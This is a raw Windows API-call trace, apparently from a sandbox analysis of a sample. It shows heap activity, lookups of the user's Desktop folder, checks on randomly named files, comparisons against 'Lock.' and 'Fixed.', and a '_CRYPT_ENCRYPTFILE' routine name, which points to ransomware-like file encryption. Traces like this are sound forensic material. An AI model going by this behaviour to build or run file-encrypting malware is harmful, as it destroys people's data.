HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0157.597] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0157.597] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0157.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0157.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0157.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0157.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0157.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0157.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0157.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0157.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0157.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HCYfZCy ufaMx.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg", lpFilePart=0x8cf650*="HCYfZCy ufaMx.jpg") returned 0x29 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0157.598] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HCYfZCy ufaMx.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hcyfzcy ufamx.jpg")) returned 0xffffffff [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0157.598] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0157.598] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.599] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0157.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0157.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0157.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0157.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hexadecimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exadecimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xadecimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="adecimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="decimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ecimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cimal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="imal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mal_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="al_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Calculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lculator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="culator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ulator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ator.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.ns", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0157.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0157.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0157.600] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0157.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0157.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0157.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0157.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x34) returned 0x2e77808 [0157.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hexadecimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exadecimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xadecimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="adecimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="decimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ecimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cimal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="imal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mal_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="al_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Calculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lculator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="culator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ulator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ator.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0157.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.ns", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0157.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0157.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0157.775] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0157.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0157.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0157.775] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0157.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0157.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0157.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0157.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0157.776] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0157.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0157.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0157.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0157.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0157.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0157.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0157.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0157.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0157.778] RtlAllocateHeap 